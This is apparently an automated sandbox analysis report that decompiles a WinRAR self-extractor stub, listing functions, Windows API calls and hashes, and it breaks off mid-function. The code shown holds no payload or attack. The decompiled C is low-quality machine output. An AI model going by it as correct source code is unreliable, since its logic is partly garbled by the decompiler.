25249 a1ab52 GetDlgItem EnableWindow ShowWindow SendMessageW 25154 a1dc54 25155 a1db58 25154->25155 25156 a1e221 ___delayLoadHelper2@8 19 API calls 25155->25156 25156->25155

                                                        Executed Functions

                                                        Function 00A1D891 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197filesleeptimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        C-Code - Quality: 16%
                                                        			E00A1D891(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a84, void* _a86, void* _a90, void* _a92, void* _a94, void* _a96, void* _a98, void* _a100, void* _a104, void* _a144, void* _a148, void* _a196) {
				char _v208;
				void* __ebx;
				void* __edi;
				void* _t41;
				void* _t42;
				long _t51;
				void* _t54;
				intOrPtr _t58;
				struct HWND__* _t74;
				void* _t75;
				WCHAR* _t94;
				struct HINSTANCE__* _t95;
				intOrPtr _t96;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t121;

				_t121 = __fp0;
				_t99 = __ebp;
				_t88 = __edx;
				E00A103AA(__edx, 1);
				E00A1A004("C:\Users\hardz\Desktop", 0x800);
				E00A1A5C6( &_v208); // executed
				E00A116CB(0xa481e0);
				_t74 = 0;
				E00A1F5F0(0x7104, 0xa56b80, 0, 0x7104);
				_t102 = _t101 + 0xc;
				_t94 = GetCommandLineW();
				_t106 = _t94;
				if(_t94 != 0) {
					_push(_t94);
					E00A1BF14(0, _t106);
					if( *0xa4a471 == 0) {
						E00A1D544(__eflags, _t94);
					} else {
						_push(__ebp);
						_t100 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
						if(_t100 != 0) {
							UnmapViewOfFile(_t75);
							_t74 = 0;
						}
						CloseHandle(_t100);
						_pop(_t99);
					}
				}
				GetModuleFileNameW(_t74, 0xa5dc90, 0x800);
				SetEnvironmentVariableW(L"sfxname", 0xa5dc90); // executed
				GetLocalTime(_t102 + 0xc);
				_push( *(_t102 + 0x1a) & 0x0000ffff);
				_push( *(_t102 + 0x1c) & 0x0000ffff);
				_push( *(_t102 + 0x1e) & 0x0000ffff);
				_push( *(_t102 + 0x20) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				_push( *(_t102 + 0x22) & 0x0000ffff);
				E00A03F8F(_t102 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t102 + 0x24) & 0x0000ffff);
				_t103 = _t102 + 0x28;
				SetEnvironmentVariableW(L"sfxstime", _t103 + 0x7c);
				_t95 = GetModuleHandleW(_t74);
				 *0xa40ed4 = _t95;
				 *0xa40ed0 = _t95; // executed
				_t41 = LoadIconW(_t95, 0x64); // executed
				 *0xa4c574 = _t41; // executed
				_t42 = E00A1B07D(0xa481e0, _t88, _t121); // executed
				 *0xa56b7c = _t42;
				E00A0D5DC(0xa40ee8, _t88, _t99, 0xa5dc90);
				E00A18A75(0);
				E00A18A75(0);
				 *0xa48440 = _t103 + 0x5c;
				 *0xa48444 = _t103 + 0x30; // executed
				DialogBoxParamW(_t95, L"STARTDLG", _t74, E00A1B170, _t74); // executed
				 *0xa48444 = _t74;
				 *0xa48440 = _t74;
				E00A18B33(_t103 + 0x24);
				E00A18B33(_t103 + 0x50);
				_t51 =  *0xa5eca0;
				if(_t51 != 0) {
					Sleep(_t51);
				}
				if( *0xa49468 != 0) {
					E00A1A7D4(0xa5dc90);
				}
				E00A0EE02(0xa56a78);
				if( *0xa4843c > 0) {
					L00A1E7FC( *0xa48438);
				}
				DeleteObject( *0xa4c574);
				_t54 =  *0xa56b7c;
				if(_t54 != 0) {
					DeleteObject(_t54);
				}
				if( *0xa40f50 == 0 &&  *0xa48450 != 0) {
					E00A06FBA(0xa40f50, 0xff);
				}
				_t55 =  *0xa5eca4;
				 *0xa48450 = 1;
				if( *0xa5eca4 != 0) {
					E00A1D5A3(_t55);
					CloseHandle( *0xa5eca4);
				}
				_t96 =  *0xa40f50; // 0x0
				if( *0xa5ec99 != 0) {
					_t58 =  *0xa3e5fc; // 0x3e8
					if( *0xa5ec9a == 0) {
						__eflags = _t58;
						if(_t58 < 0) {
							_t96 = _t96 - _t58;
							__eflags = _t96;
						}
					} else {
						_t96 =  *0xa5ec9c;
						if(_t58 > 0) {
							_t96 = _t96 + _t58;
						}
					}
				}
				E00A1A62E(_t103 + 0x1c); // executed
				return _t96;
			}





















                                                        0x00a1d891
                                                        0x00a1d891
                                                        0x00a1d891
                                                        0x00a1d89c
                                                        0x00a1d8ab
                                                        0x00a1d8b4
                                                        0x00a1d8be
                                                        0x00a1d8c8
                                                        0x00a1d8d1
                                                        0x00a1d8d6
                                                        0x00a1d8df
                                                        0x00a1d8e1
                                                        0x00a1d8e3
                                                        0x00a1d8e5
                                                        0x00a1d8e6
                                                        0x00a1d8f1
                                                        0x00a1d95e
                                                        0x00a1d8f3
                                                        0x00a1d8f3
                                                        0x00a1d906
                                                        0x00a1d90a
                                                        0x00a1d94b
                                                        0x00a1d951
                                                        0x00a1d951
                                                        0x00a1d954
                                                        0x00a1d95a
                                                        0x00a1d95a
                                                        0x00a1d8f1
                                                        0x00a1d96f
                                                        0x00a1d97b
                                                        0x00a1d986
                                                        0x00a1d991
                                                        0x00a1d997
                                                        0x00a1d99d
                                                        0x00a1d9a3
                                                        0x00a1d9a9
                                                        0x00a1d9af
                                                        0x00a1d9c5
                                                        0x00a1d9ca
                                                        0x00a1d9d7
                                                        0x00a1d9e4
                                                        0x00a1d9e9
                                                        0x00a1d9ef
                                                        0x00a1d9f5
                                                        0x00a1d9fb
                                                        0x00a1da00
                                                        0x00a1da0b
                                                        0x00a1da10
                                                        0x00a1da19
                                                        0x00a1da22
                                                        0x00a1da32
                                                        0x00a1da41
                                                        0x00a1da46
                                                        0x00a1da50
                                                        0x00a1da56
                                                        0x00a1da5c
                                                        0x00a1da65
                                                        0x00a1da6a
                                                        0x00a1da71
                                                        0x00a1da74
                                                        0x00a1da74
                                                        0x00a1da81
                                                        0x00a1da83
                                                        0x00a1da83
                                                        0x00a1da8d
                                                        0x00a1da99
                                                        0x00a1daa1
                                                        0x00a1daa6
                                                        0x00a1daad
                                                        0x00a1dab3
                                                        0x00a1daba
                                                        0x00a1dabd
                                                        0x00a1dabd
                                                        0x00a1daca
                                                        0x00a1dadf
                                                        0x00a1dadf
                                                        0x00a1dae4
                                                        0x00a1dae9
                                                        0x00a1daf2
                                                        0x00a1daf5
                                                        0x00a1db00
                                                        0x00a1db00
                                                        0x00a1db0d
                                                        0x00a1db13
                                                        0x00a1db1c
                                                        0x00a1db21
                                                        0x00a1db31
                                                        0x00a1db33
                                                        0x00a1db35
                                                        0x00a1db35
                                                        0x00a1db35
                                                        0x00a1db23
                                                        0x00a1db23
                                                        0x00a1db2b
                                                        0x00a1db2d
                                                        0x00a1db2d
                                                        0x00a1db2b
                                                        0x00a1db21
                                                        0x00a1db3b
                                                        0x00a1db4b

                                                        APIs
                                                          • Part of subcall function 00A103AA: GetModuleHandleW.KERNEL32(kernel32), ref: 00A103BF
                                                          • Part of subcall function 00A103AA: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00A103D1
                                                          • Part of subcall function 00A103AA: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A10402
                                                          • Part of subcall function 00A1A004: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00A1A00C
                                                          • Part of subcall function 00A1A5C6: OleInitialize.OLE32(00000000), ref: 00A1A5DF
                                                          • Part of subcall function 00A1A5C6: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A1A616
                                                          • Part of subcall function 00A1A5C6: SHGetMalloc.SHELL32(00A48430), ref: 00A1A620
                                                          • Part of subcall function 00A116CB: GetCPInfo.KERNEL32(00000000,?), ref: 00A116DC
                                                          • Part of subcall function 00A116CB: IsDBCSLeadByte.KERNEL32(00000000), ref: 00A116F0
                                                        • GetCommandLineW.KERNEL32 ref: 00A1D8D9
                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00A1D900
                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00A1D911
                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00A1D94B
                                                          • Part of subcall function 00A1D544: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00A1D55A
                                                          • Part of subcall function 00A1D544: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A1D596
                                                        • CloseHandle.KERNEL32(00000000), ref: 00A1D954
                                                        • GetModuleFileNameW.KERNEL32(00000000,00A5DC90,00000800), ref: 00A1D96F
                                                        • SetEnvironmentVariableW.KERNELBASE(sfxname,00A5DC90), ref: 00A1D97B
                                                        • GetLocalTime.KERNEL32(?), ref: 00A1D986
                                                        • _swprintf.LIBCMT ref: 00A1D9C5
                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00A1D9D7
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00A1D9DE
                                                        • LoadIconW.USER32(00000000,00000064), ref: 00A1D9F5
                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B170,00000000), ref: 00A1DA46
                                                        • Sleep.KERNEL32(?), ref: 00A1DA74
                                                        • DeleteObject.GDI32 ref: 00A1DAAD
                                                        • DeleteObject.GDI32(?), ref: 00A1DABD
                                                        • CloseHandle.KERNEL32 ref: 00A1DB00
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                        • API String ID: 788466649-586660713
                                                        • Opcode ID: eb378b6398a05e2e1525cadf7617a321fe4acd8ef28add07448950e79f74a476
                                                        • Instruction ID: 351bce2e6e129691959c1c7c4980349708a77ae3423c3cae2ad0a7b98910205c
                                                        • Opcode Fuzzy Hash: eb378b6398a05e2e1525cadf7617a321fe4acd8ef28add07448950e79f74a476
                                                        • Instruction Fuzzy Hash: 1261F475508300BFD720EFF4ED49EAB3BACFB85745F040429F945921A1DBB98986C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1A07C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 811 a1a07c-a1a098 FindResourceW 812 a1a18f-a1a192 811->812 813 a1a09e-a1a0b0 SizeofResource 811->813 814 a1a0d0-a1a0d2 813->814 815 a1a0b2-a1a0c1 LoadResource 813->815 817 a1a18e 814->817 815->814 816 a1a0c3-a1a0ce LockResource 815->816 816->814 818 a1a0d7-a1a0ec GlobalAlloc 816->818 817->812 819 a1a0f2-a1a0fb GlobalLock 818->819 820 a1a188-a1a18d 818->820 821 a1a181-a1a182 GlobalFree 819->821 822 a1a101-a1a11f call a1f750 819->822 820->817 821->820 826 a1a121-a1a143 call a19fdb 822->826 827 a1a17a-a1a17b GlobalUnlock 822->827 826->827 832 a1a145-a1a14d 826->832 827->821 833 a1a168-a1a176 832->833 834 a1a14f-a1a163 GdipCreateHBITMAPFromBitmap 832->834 833->827 834->833 835 a1a165 834->835 835->833
                                                        C-Code - Quality: 54%
                                                        			E00A1A07C(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				struct HRSRC__* _t14;
				char _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				long _t44;
				intOrPtr* _t46;
				struct HRSRC__* _t47;

				_t14 = FindResourceW( *0xa40ed0, _a4, "PNG");
				_t47 = _t14;
				if(_t47 == 0) {
					return _t14;
				}
				_t44 = SizeofResource( *0xa40ed0, _t47);
				if(_t44 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0xa40ed0, _t47);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t48 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t44); // executed
					_t35 = _t19;
					if(_t35 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t35) == 0) {
						L14:
						GlobalFree(_t35);
						goto L15;
					}
					E00A1F750(_t20, _t48, _t44);
					_v8 = 0;
					_push( &_v8);
					_push(0);
					_push(_t35);
					if( *0xa6217c() == 0) {
						_t26 = E00A19FDB(_t24, _t37, _v20, 0); // executed
						_t38 = _v28;
						_t46 = _t26;
						 *0xa33260(_t38);
						 *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
						if(_t46 != 0) {
							 *((intOrPtr*)(_t46 + 8)) = 0;
							if( *((intOrPtr*)(_t46 + 8)) == 0) {
								_push(0xffffff);
								_t33 =  &_v20;
								_push(_t33);
								_push( *((intOrPtr*)(_t46 + 4)));
								L00A1E500(); // executed
								if(_t33 != 0) {
									 *((intOrPtr*)(_t46 + 8)) = _t33;
								}
							}
							 *0xa33260(1);
							 *((intOrPtr*)( *((intOrPtr*)( *_t46))))();
						}
					}
					GlobalUnlock(_t35);
					goto L14;
				}
				goto L4;
			}





















                                                        0x00a1a08e
                                                        0x00a1a094
                                                        0x00a1a098
                                                        0x00a1a192
                                                        0x00a1a192
                                                        0x00a1a0ac
                                                        0x00a1a0b0
                                                        0x00a1a0d0
                                                        0x00a1a0d0
                                                        0x00a1a18e
                                                        0x00000000
                                                        0x00a1a18e
                                                        0x00a1a0b9
                                                        0x00a1a0c1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1a0c4
                                                        0x00a1a0ca
                                                        0x00a1a0ce
                                                        0x00a1a0de
                                                        0x00a1a0e2
                                                        0x00a1a0e8
                                                        0x00a1a0ec
                                                        0x00a1a188
                                                        0x00a1a188
                                                        0x00000000
                                                        0x00a1a18d
                                                        0x00a1a0fb
                                                        0x00a1a181
                                                        0x00a1a182
                                                        0x00000000
                                                        0x00a1a182
                                                        0x00a1a104
                                                        0x00a1a10c
                                                        0x00a1a114
                                                        0x00a1a115
                                                        0x00a1a116
                                                        0x00a1a11f
                                                        0x00a1a126
                                                        0x00a1a12b
                                                        0x00a1a12f
                                                        0x00a1a139
                                                        0x00a1a13f
                                                        0x00a1a143
                                                        0x00a1a148
                                                        0x00a1a14d
                                                        0x00a1a14f
                                                        0x00a1a154
                                                        0x00a1a158
                                                        0x00a1a159
                                                        0x00a1a15c
                                                        0x00a1a163
                                                        0x00a1a165
                                                        0x00a1a165
                                                        0x00a1a163
                                                        0x00a1a170
                                                        0x00a1a178
                                                        0x00a1a178
                                                        0x00a1a143
                                                        0x00a1a17b
                                                        0x00000000
                                                        0x00a1a17b
                                                        0x00000000

                                                        APIs
                                                        • FindResourceW.KERNEL32(00A1B0DD,PNG,?,?,?,00A1B0DD,00000066), ref: 00A1A08E
                                                        • SizeofResource.KERNEL32(00000000,00000000,?,?,?,00A1B0DD,00000066), ref: 00A1A0A6
                                                        • LoadResource.KERNEL32(00000000,?,?,?,00A1B0DD,00000066), ref: 00A1A0B9
                                                        • LockResource.KERNEL32(00000000,?,?,?,00A1B0DD,00000066), ref: 00A1A0C4
                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00A1B0DD,00000066), ref: 00A1A0E2
                                                        • GlobalLock.KERNEL32 ref: 00A1A0F3
                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00A1A15C
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00A1A17B
                                                        • GlobalFree.KERNEL32 ref: 00A1A182
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                        • String ID: PNG
                                                        • API String ID: 4097654274-364855578
                                                        • Opcode ID: d9fec89dfcb35fa9061ffcc2ecbf0a0d74ae7564207279ac9cb133b4ae6bbad3
                                                        • Instruction ID: 1848d4a27e73f72c2bc0ee46afb9bd3a17bbbbd43f9b4d78621979a1df6f840f
                                                        • Opcode Fuzzy Hash: d9fec89dfcb35fa9061ffcc2ecbf0a0d74ae7564207279ac9cb133b4ae6bbad3
                                                        • Instruction Fuzzy Hash: 9D31D376205306BFCB11CFA1EC48D5BBBA8FF95751F004618F905D2260EB71DC42DA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0A7E7 Relevance: 7.6, APIs: 5, Instructions: 107fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1017 a0a7e7-a0a812 call a1e630 1020 a0a884-a0a88d FindNextFileW 1017->1020 1021 a0a814-a0a825 FindFirstFileW 1017->1021 1024 a0a8a3-a0a8a5 1020->1024 1025 a0a88f-a0a89d GetLastError 1020->1025 1022 a0a8ab-a0a94f call a10131 call a0beff call a110e9 * 3 1021->1022 1023 a0a82b-a0a842 call a0b85c 1021->1023 1027 a0a954-a0a967 1022->1027 1032 a0a844-a0a85b FindFirstFileW 1023->1032 1033 a0a85d-a0a866 GetLastError 1023->1033 1024->1022 1024->1027 1025->1024 1032->1022 1032->1033 1035 a0a877 1033->1035 1036 a0a868-a0a86b 1033->1036 1039 a0a879-a0a87f 1035->1039 1036->1035 1038 a0a86d-a0a870 1036->1038 1038->1035 1041 a0a872-a0a875 1038->1041 1039->1027 1041->1039
                                                        C-Code - Quality: 80%
                                                        			E00A0A7E7(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
				struct _WIN32_FIND_DATAW _v0;
				char _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				signed int _t43;
				signed int _t49;
				signed int _t63;
				void* _t65;
				long _t68;
				char _t69;
				signed int _t74;
				void* _t75;
				void* _t81;
				intOrPtr _t83;
				void* _t86;

				_t81 = __edx;
				E00A1E630();
				_push(_t74);
				_t86 = _a4692;
				_t83 = _a4700;
				_t75 = _t74 | 0xffffffff;
				_push( &_v0);
				if(_t86 != _t75) {
					_t43 = FindNextFileW(_t86, ??);
					__eflags = _t43;
					if(_t43 == 0) {
						_t86 = _t75;
						_t63 = GetLastError();
						__eflags = _t63 - 0x12;
						_t11 = _t63 != 0x12;
						__eflags = _t11;
						 *((char*)(_t83 + 0x1044)) = _t63 & 0xffffff00 | _t11;
					}
					__eflags = _t86 - _t75;
					if(_t86 != _t75) {
						goto L13;
					}
				} else {
					_t65 = FindFirstFileW(_a4696, ??); // executed
					_t86 = _t65;
					if(_t86 != _t75) {
						L13:
						E00A10131(_t83, _a4696, 0x800);
						_push(0x800);
						E00A0BEFF(__eflags, _t83,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t83 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t83 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t83 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t83 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t83 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t83 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t83 + 0x1038)) = _v4;
						 *(_t83 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t83 + 0x1004)) = _a4;
						E00A110E9(_t83 + 0x1010, _t81,  &_v4);
						E00A110E9(_t83 + 0x1018, _t81,  &_v24);
						E00A110E9(_t83 + 0x1020, _t81,  &_v20);
					} else {
						if(E00A0B85C(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t83 + 0x1044)) = _t69;
						} else {
							_t86 = FindFirstFileW( &_a592,  &_v0);
							if(_t86 != _t75) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t83 + 0x1040) =  *(_t83 + 0x1040) & 0x00000000;
				return _t86;
			}





















                                                        0x00a0a7e7
                                                        0x00a0a7ec
                                                        0x00a0a7f1
                                                        0x00a0a7f4
                                                        0x00a0a800
                                                        0x00a0a807
                                                        0x00a0a80f
                                                        0x00a0a812
                                                        0x00a0a885
                                                        0x00a0a88b
                                                        0x00a0a88d
                                                        0x00a0a88f
                                                        0x00a0a891
                                                        0x00a0a897
                                                        0x00a0a89a
                                                        0x00a0a89a
                                                        0x00a0a89d
                                                        0x00a0a89d
                                                        0x00a0a8a3
                                                        0x00a0a8a5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0a814
                                                        0x00a0a81b
                                                        0x00a0a821
                                                        0x00a0a825
                                                        0x00a0a8ab
                                                        0x00a0a8b4
                                                        0x00a0a8b9
                                                        0x00a0a8c0
                                                        0x00a0a8cb
                                                        0x00a0a8cb
                                                        0x00a0a8cf
                                                        0x00a0a8d9
                                                        0x00a0a8dc
                                                        0x00a0a8e6
                                                        0x00a0a8f0
                                                        0x00a0a8fa
                                                        0x00a0a904
                                                        0x00a0a90e
                                                        0x00a0a918
                                                        0x00a0a922
                                                        0x00a0a92f
                                                        0x00a0a93f
                                                        0x00a0a94f
                                                        0x00a0a82b
                                                        0x00a0a842
                                                        0x00a0a85d
                                                        0x00a0a85d
                                                        0x00a0a866
                                                        0x00a0a877
                                                        0x00a0a877
                                                        0x00a0a872
                                                        0x00a0a874
                                                        0x00a0a874
                                                        0x00a0a879
                                                        0x00a0a844
                                                        0x00a0a857
                                                        0x00a0a85b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0a85b
                                                        0x00a0a842
                                                        0x00a0a825
                                                        0x00a0a954
                                                        0x00a0a967

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00A0A6E2,000000FF,?,?), ref: 00A0A81B
                                                        • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00A0A6E2,000000FF,?,?), ref: 00A0A851
                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00A0A6E2,000000FF,?,?), ref: 00A0A85D
                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,00A0A6E2,000000FF,?,?), ref: 00A0A885
                                                        • GetLastError.KERNEL32(?,?,?,?,00A0A6E2,000000FF,?,?), ref: 00A0A891
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: FileFind$ErrorFirstLast$Next
                                                        • String ID:
                                                        • API String ID: 869497890-0
                                                        • Opcode ID: d297c28602ae3f446b074a6cc2444d20740f6a538f8246caf652cc160dd609b0
                                                        • Instruction ID: e8d57a15f27b9b41a234f69ce608557cff05e8e6fbfd33f14ad45e53323be06c
                                                        • Opcode Fuzzy Hash: d297c28602ae3f446b074a6cc2444d20740f6a538f8246caf652cc160dd609b0
                                                        • Instruction Fuzzy Hash: 00418572504385AFC724DF74D984ADAF7E8FF59340F004A29F599D3140D734A999CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2780E Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A2780E(int _a4) {
				void* _t14;
				void* _t16;

				if(E00A2AB46(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00A27893(_t14, _t16, _a4);
				ExitProcess(_a4);
			}





                                                        0x00a2781a
                                                        0x00a27836
                                                        0x00a27836
                                                        0x00a2783f
                                                        0x00a27848

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(?,?,00A277E4,?,00A3BAD8,0000000C,00A2793B,?,00000002,00000000), ref: 00A2782F
                                                        • TerminateProcess.KERNEL32(00000000,?,00A277E4,?,00A3BAD8,0000000C,00A2793B,?,00000002,00000000), ref: 00A27836
                                                        • ExitProcess.KERNEL32 ref: 00A27848
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: b8d4037f5c843fe01daabaf6369d1bdcd37cc9802b78ad65ec623c868f9d54ce
                                                        • Instruction ID: 3e7fda3f779484c31f97e9d05676e84eed861f06936c4a031509198ed2055bee
                                                        • Opcode Fuzzy Hash: b8d4037f5c843fe01daabaf6369d1bdcd37cc9802b78ad65ec623c868f9d54ce
                                                        • Instruction Fuzzy Hash: B3E0B632009218ABCF11AFA8EE0DA497F6AEB51741B004434F9058A272CB35DEC3CA90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A08709 Relevance: 3.9, APIs: 2, Instructions: 948COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 81%
                                                        			E00A08709(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t372;
				signed int _t376;
				signed int _t377;
				signed int _t382;
				signed int _t388;
				void* _t390;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t401;
				signed int _t406;
				signed int _t407;
				signed int _t411;
				signed int _t421;
				signed int _t422;
				signed int _t425;
				signed int _t426;
				signed int _t435;
				char _t437;
				char _t439;
				signed int _t440;
				signed int _t441;
				signed int _t464;
				signed int _t473;
				intOrPtr _t476;
				char _t483;
				signed int _t484;
				void* _t495;
				void* _t503;
				void* _t505;
				signed int _t515;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t524;
				signed int _t527;
				signed int _t535;
